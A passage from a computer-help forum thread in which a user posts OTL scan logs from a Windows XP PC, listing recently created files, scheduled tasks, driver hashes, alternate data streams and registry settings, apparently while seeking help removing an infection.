    [2010/12/01 14:39:34 | 000,000,288 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf
    [2010/12/01 14:36:02 | 000,316,640 | ---- | M] () -- C:\WINDOWS\WMSysPr9.prx
    [2010/12/01 14:36:00 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb
    [2010/12/01 14:36:00 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb
    [2010/12/01 14:35:47 | 000,004,161 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI
    [2010/12/01 14:33:25 | 000,022,720 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat
    [2010/12/01 14:32:06 | 000,000,211 | -HS- | M] () -- C:\boot.ini
    [2010/11/30 07:57:06 | 000,008,141 | ---- | M] () -- C:\WINDOWS\System32\5123.js
    [2010/11/30 07:37:03 | 000,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    [2010/11/29 17:42:18 | 000,038,224 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
    [2010/11/29 17:42:06 | 000,020,952 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
    [2010/11/28 22:21:28 | 000,000,069 | ---- | M] () -- C:\WINDOWS\NeroDigital.ini
    [2010/11/28 22:07:38 | 000,032,768 | ---- | M] () -- C:\Documents and Settings\Marshall\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    [2010/11/27 13:05:11 | 000,000,605 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\Microsoft\Internet Explorer\Quick Launch\Game Booster.lnk
    [2010/11/25 23:01:01 | 000,000,292 | ---- | M] () -- C:\WINDOWS\tasks\RealUpgradeScheduledTaskS-1-5-21-1202660629-1500820517-682003330-1003.job
    [2010/11/23 16:31:14 | 000,022,328 | ---- | M] () -- C:\WINDOWS\System32\drivers\PnkBstrK.sys
    [2010/11/23 16:31:14 | 000,022,328 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\PnkBstrK.sys
    [2010/11/23 16:30:53 | 000,669,184 | ---- | M] () -- C:\WINDOWS\System32\pbsvc.exe
    [2010/11/23 15:49:57 | 000,001,480 | ---- | M] () -- C:\WINDOWS\System32\ealregsnapshot1.reg
    [2010/11/17 20:37:08 | 000,001,597 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\MPQEditor.ini
    [2010/11/17 16:05:38 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
    [2010/11/09 16:02:10 | 000,000,056 | -H-- | M] () -- C:\WINDOWS\System32\ezsidmv.dat
    [9 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
    [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

    ========== Files Created - No Company Name ==========

    [2010/12/05 11:39:12 | 000,001,374 | ---- | C] () -- C:\WINDOWS\imsins.BAK
    [2010/12/04 17:21:30 | 000,497,050 | ---- | C] () -- C:\WINDOWS\System32\drivers\Cat.DB
    [2010/12/01 14:37:37 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\pintlcsa.dll
    [2010/12/01 14:37:19 | 001,158,818 | ---- | C] () -- C:\WINDOWS\System32\dllcache\korwbrkr.lex
    [2010/12/01 14:37:14 | 000,059,392 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imscinst.exe
    [2010/12/01 14:37:13 | 000,196,665 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imjpinst.exe
    [2010/12/01 14:37:11 | 000,134,339 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imekr.lex
    [2010/12/01 14:37:04 | 013,463,552 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hwxjpn.dll
    [2010/12/01 14:37:00 | 000,108,827 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hanja.lex
    [2010/12/01 14:36:57 | 000,094,208 | ---- | C] () -- C:\WINDOWS\System32\dllcache\fpencode.dll
    [2010/12/01 14:36:45 | 000,173,568 | ---- | C] () -- C:\WINDOWS\System32\dllcache\chtskf.dll
    [2010/12/01 13:46:45 | 000,141,702 | ---- | C] () -- C:\WINDOWS\System32\dllcache\netfx.cat
    [2010/12/01 13:46:45 | 000,110,116 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tabletpc.cat
    [2010/12/01 13:46:45 | 000,037,484 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MW770.CAT
    [2010/12/01 13:46:45 | 000,031,965 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mediactr.cat
    [2010/12/01 13:46:45 | 000,024,209 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msn7.cat
    [2010/12/01 13:46:45 | 000,013,472 | ---- | C] () -- C:\WINDOWS\System32\dllcache\HPCRDP.CAT
    [2010/12/01 13:46:45 | 000,011,651 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msn9.cat
    [2010/12/01 13:46:45 | 000,008,574 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IASNT4.CAT
    [2010/12/01 13:46:45 | 000,007,382 | ---- | C] () -- C:\WINDOWS\System32\dllcache\OEMBIOS.CAT
    [2010/12/01 13:46:45 | 000,007,245 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSTSWEB.CAT
    [2010/12/01 13:46:44 | 002,012,670 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5.CAT
    [2010/12/01 13:46:44 | 001,042,903 | ---- | C] () -- C:\WINDOWS\System32\dllcache\SP2.CAT
    [2010/12/01 13:46:44 | 000,797,189 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5IIS.CAT
    [2010/12/01 13:46:44 | 000,502,724 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5INF.CAT
    [2010/12/01 13:46:44 | 000,399,645 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MAPIMIG.CAT
    [2010/12/01 13:46:44 | 000,031,281 | ---- | C] () -- C:\WINDOWS\System32\dllcache\FP4.CAT
    [2010/12/01 13:46:44 | 000,013,753 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IMS.CAT
    [2010/12/01 13:46:44 | 000,009,581 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSMSGS.CAT
    [2010/11/30 07:57:06 | 000,008,141 | ---- | C] () -- C:\WINDOWS\System32\5123.js
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At9.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At8.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At7.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At24.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At23.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At22.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At21.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At20.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At19.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At18.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At17.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At16.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At15.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At14.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At13.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At12.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At11.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At10.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At6.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At5.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At4.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At3.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At2.job
    [2010/11/27 13:07:29 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At1.job
    [2010/11/27 13:05:11 | 000,000,605 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\Microsoft\Internet Explorer\Quick Launch\Game Booster.lnk
    [2010/11/17 16:05:38 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
    [2010/11/12 17:29:50 | 000,001,480 | ---- | C] () -- C:\WINDOWS\System32\ealregsnapshot1.reg
    [2010/11/12 17:20:19 | 000,022,328 | ---- | C] () -- C:\WINDOWS\System32\drivers\PnkBstrK.sys
    [2010/11/12 17:20:19 | 000,022,328 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\PnkBstrK.sys
    [2010/11/12 17:20:02 | 000,103,736 | ---- | C] () -- C:\WINDOWS\System32\PnkBstrB.exe
    [2010/11/12 17:20:01 | 000,669,184 | ---- | C] () -- C:\WINDOWS\System32\pbsvc.exe
    [2010/11/12 17:20:01 | 000,066,872 | ---- | C] () -- C:\WINDOWS\System32\PnkBstrA.exe
    [2010/11/09 16:02:10 | 000,000,056 | -H-- | C] () -- C:\WINDOWS\System32\ezsidmv.dat
    [2010/11/01 20:25:23 | 000,000,328 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\ICARE_ACTIVITY.LOG
    [2010/09/29 17:22:36 | 000,021,840 | ---- | C] () -- C:\WINDOWS\System32\SIntfNT.dll
    [2010/09/29 17:22:36 | 000,017,212 | ---- | C] () -- C:\WINDOWS\System32\SIntf32.dll
    [2010/09/29 17:22:36 | 000,012,067 | ---- | C] () -- C:\WINDOWS\System32\SIntf16.dll
    [2010/09/26 18:51:55 | 000,000,262 | ---- | C] () -- C:\WINDOWS\{789289CA-F73A-4A16-A331-54D498CE069F}_WiseFW.ini
    [2010/09/06 19:33:38 | 000,001,597 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\MPQEditor.ini
    [2010/07/22 23:37:03 | 000,032,768 | ---- | C] () -- C:\Documents and Settings\Marshall\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    [2010/07/14 23:37:22 | 000,000,069 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
    [2010/07/14 23:35:43 | 000,165,376 | ---- | C] () -- C:\WINDOWS\System32\unrar.dll
    [2010/07/14 23:35:43 | 000,000,038 | ---- | C] () -- C:\WINDOWS\avisplitter.ini
    [2010/07/14 23:35:42 | 000,881,664 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
    [2010/07/14 23:35:42 | 000,205,824 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll
    [2010/07/14 23:35:40 | 000,085,504 | ---- | C] () -- C:\WINDOWS\System32\ff_vfw.dll
    [2010/07/14 20:10:01 | 001,584,149 | ---- | C] () -- C:\WINDOWS\System32\setupapinew.dll
    [2010/07/14 20:10:01 | 000,789,525 | ---- | C] () -- C:\WINDOWS\System32\rpcrt4new.dll
    [2010/07/14 20:10:01 | 000,633,871 | ---- | C] () -- C:\WINDOWS\System32\user32new.dll
    [2010/07/14 20:10:01 | 000,134,671 | ---- | C] () -- C:\WINDOWS\System32\winstanew.dll
    [2010/07/14 20:10:01 | 000,096,783 | ---- | C] () -- C:\WINDOWS\System32\powrprofnew.dll
    [2010/07/14 20:10:01 | 000,087,558 | ---- | C] () -- C:\WINDOWS\System32\ntdsapinew.dll
    [2010/07/14 20:10:01 | 000,072,707 | ---- | C] () -- C:\WINDOWS\System32\secur32new.dll
    [2010/07/14 20:10:01 | 000,025,037 | ---- | C] () -- C:\WINDOWS\System32\Nucleus.dll
    [2010/07/14 20:10:01 | 000,000,236 | -H-- | C] () -- C:\Program Files\Common Files\dx.reg
    [2010/07/14 20:10:00 | 000,874,502 | ---- | C] () -- C:\WINDOWS\System32\kernel32new.dll
    [2010/07/14 20:10:00 | 000,681,478 | ---- | C] () -- C:\WINDOWS\System32\msvcrtnew.dll
    [2010/07/14 20:10:00 | 000,376,832 | ---- | C] () -- C:\WINDOWS\System32\M2000Twn.dll
    [2010/07/14 20:10:00 | 000,167,948 | ---- | C] () -- C:\WINDOWS\System32\dxgi.dll
    [2010/07/14 20:10:00 | 000,039,948 | ---- | C] () -- C:\WINDOWS\System32\dwmapi.dll
    [2010/07/14 20:09:59 | 001,029,126 | ---- | C] () -- C:\WINDOWS\System32\d3d10.dll
    [2010/07/14 20:09:59 | 000,974,354 | ---- | C] () -- C:\WINDOWS\System32\crypt32new.dll
    [2010/07/14 20:09:59 | 000,770,069 | ---- | C] () -- C:\WINDOWS\System32\advapi32new.dll
    [2010/07/14 20:09:59 | 000,187,398 | ---- | C] () -- C:\WINDOWS\System32\d3d10core.dll
    [2010/07/14 20:09:59 | 000,171,023 | ---- | C] () -- C:\WINDOWS\System32\apphelpnew.dll
    [2010/07/14 18:12:40 | 000,000,760 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\setup_ldm.iss
    [2010/07/14 03:55:03 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
    [2010/04/02 18:17:34 | 000,179,091 | ---- | C] () -- C:\WINDOWS\System32\xlive.dll.cat
    [2009/08/03 15:07:42 | 000,403,816 | ---- | C] () -- C:\WINDOWS\System32\OGACheckControl.dll
    [2004/08/04 23:00:00 | 000,027,440 | ---- | C] () -- C:\WINDOWS\System32\drivers\secdrv.sys

    ========== LOP Check ==========

    [2010/07/25 11:51:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
    [2010/07/25 12:33:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Pro
    [2010/10/24 14:07:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IObit
    [2010/08/21 13:15:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\LightScribe
    [2010/12/04 17:31:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
    [2010/12/04 16:31:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PMB Files
    [2010/10/23 13:41:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Sony
    [2010/12/04 17:28:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
    [2010/11/27 13:09:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TuneUp Software
    [2010/09/28 00:30:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Ubisoft
    [2010/12/04 15:12:50 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    [2010/11/27 13:07:11 | 000,000,000 | -HSD | M] -- C:\Documents and Settings\All Users\Application Data\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    [2010/07/16 17:37:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
    [2010/07/14 20:52:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
    [2010/07/30 20:52:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\AnvSoft
    [2010/07/25 12:52:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\DAEMON Tools Lite
    [2010/07/25 12:33:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\DAEMON Tools Pro
    [2010/08/20 14:39:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\fltk.org
    [2010/10/24 14:05:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\IObit
    [2010/10/21 23:06:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\JLC's Software
    [2010/07/14 18:12:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Leadertech
    [2010/11/01 21:08:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\LolClient
    [2010/07/14 19:25:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\OpenOffice.org
    [2010/10/23 13:56:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Publish Providers
    [2010/10/23 13:56:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Sony
    [2010/10/20 17:35:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Subversion
    [2010/11/27 13:10:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\TuneUp Software
    [2010/09/28 00:30:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Ubisoft
    [2010/09/29 18:39:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Xilisoft Corporation
    [2010/12/06 04:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At1.job
    [2010/12/06 10:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At10.job
    [2010/12/05 14:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At11.job
    [2010/12/06 09:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At12.job
    [2010/12/05 16:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At13.job
    [2010/12/05 22:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At14.job
    [2010/12/06 06:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At15.job
    [2010/12/05 21:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At16.job
    [2010/12/06 00:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At17.job
    [2010/12/06 01:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At18.job
    [2010/12/06 08:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At19.job
    [2010/12/06 11:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At2.job
    [2010/12/05 23:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At20.job
    [2010/12/06 05:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At21.job
    [2010/12/05 20:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At22.job
    [2010/12/05 15:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At23.job
    [2010/12/06 07:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At24.job
    [2010/12/05 17:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At3.job
    [2010/12/05 19:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At4.job
    [2010/12/05 13:58:50 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At5.job
    [2010/12/06 12:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At6.job
    [2010/12/06 02:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At7.job
    [2010/12/05 18:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At8.job
    [2010/12/06 03:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At9.job
    [2010/12/05 14:46:14 | 000,000,236 | ---- | M] () -- C:\WINDOWS\Tasks\OGALogon.job

    ========== Purity Check ==========



    ========== Custom Scans ==========


    < %SYSTEMDRIVE%\*.exe >
    [2007/11/07 09:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe


    < MD5 for: AGP440.SYS >
    [2004/08/04 23:00:00 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
    [2008/04/14 05:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\agp440.sys
    [2004/08/04 23:00:00 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\system32\drivers\agp440.sys

    < MD5 for: ATAPI.SYS >
    [2004/08/04 23:00:00 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
    [2008/04/14 05:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\atapi.sys
    [2004/08/04 23:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\drivers\atapi.sys

    < MD5 for: EVENTLOG.DLL >
    [2008/04/14 11:11:53 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\eventlog.dll
    [2004/08/04 23:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\system32\dllcache\eventlog.dll
    [2004/08/04 23:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\system32\eventlog.dll

    < MD5 for: NETLOGON.DLL >
    [2008/04/14 11:12:01 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB968389\SP2QFE\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB975467\SP2QFE\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\SoftwareDistribution\Download\78cf8552430e25a8f24bc1e4dfb1970e\sp2qfe\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\SoftwareDistribution\Download\de81b460c3abcfc5b8494c785a5f3944\sp2qfe\netlogon.dll
    [2004/08/04 23:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\system32\dllcache\netlogon.dll
    [2004/08/04 23:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\system32\netlogon.dll

    < MD5 for: SCECLI.DLL >
    [2004/08/04 23:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\system32\dllcache\scecli.dll
    [2004/08/04 23:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\system32\scecli.dll
    [2008/04/14 11:12:05 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\scecli.dll

    < %systemroot%\*. /mp /s >

    < %systemroot%\system32\*.dll /lockedfiles >
    [3 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

    < %systemroot%\System32\config\*.sav >
    [2010/12/02 00:28:57 | 000,524,288 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
    [2010/11/30 08:00:15 | 000,262,144 | ---- | M] () -- C:\WINDOWS\system32\config\security.sav
    [2010/12/02 00:28:57 | 044,564,480 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
    [2010/12/02 00:28:57 | 006,029,312 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav

    ========== Alternate Data Streams ==========

    @Alternate Data Stream - 147 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:DFC5A2B2
    @Alternate Data Stream - 109 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:A8ADE5D8
    @Alternate Data Stream - 102 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:430C6D84

    < End of report >
     
    Cosmic Jester,
    #16
  18. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    OTL Extras logfile created on: 6/12/2010 12:47:58 PM - Run 1
    OTL by OldTimer - Version 3.2.17.3 Folder = C:\FIX THIS PC\BBS\OTL
    Windows XP Professional Edition Service Pack 2 (Version = 5.1.2600) - Type = NTWorkstation
    Internet Explorer (Version = 6.0.2900.2180)
    Locale: 00000C09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy

    2.00 Gb Total Physical Memory | 1.00 Gb Available Physical Memory | 51.00% Memory free
    4.00 Gb Paging File | 3.00 Gb Available in Paging File | 80.00% Paging File free
    Paging file location(s): c:\pagefile.sys 2046 4092 [binary data]

    %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
    Drive C: | 232.88 Gb Total Space | 95.97 Gb Free Space | 41.21% Space Free | Partition Type: NTFS
    Drive E: | 0.38 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

    Computer Name: MARSHALL-D40729 | User Name: Marshall | Logged in as Administrator.
    Boot Mode: Normal | Scan Mode: Current user | Quick Scan
    Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

    ========== Extra Registry (SafeList) ==========


    ========== File Associations ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

    [HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
    .html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

    ========== Shell Spawning ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
    batfile [open] -- "%1" %*
    cmdfile [open] -- "%1" %*
    comfile [open] -- "%1" %*
    exefile [open] -- "%1" %*
    http [open] -- Reg Error: Key error.
    https [open] -- Reg Error: Key error.
    piffile [open] -- "%1" %*
    regfile [merge] -- Reg Error: Key error.
    scrfile [config] -- "%1 "
    scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
    scrfile [open] -- "%1" /S
    txtfile [edit] -- Reg Error: Key error.
    Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
    Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
    Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
    Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
    Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

    ========== Security Center Settings ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
    "FirstRunDisabled" = 1
    "AntiVirusDisableNotify" = 0
    "FirewallDisableNotify" = 0
    "UpdatesDisableNotify" = 0
    "AntiVirusOverride" = 1
    "FirewallOverride" = 0

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

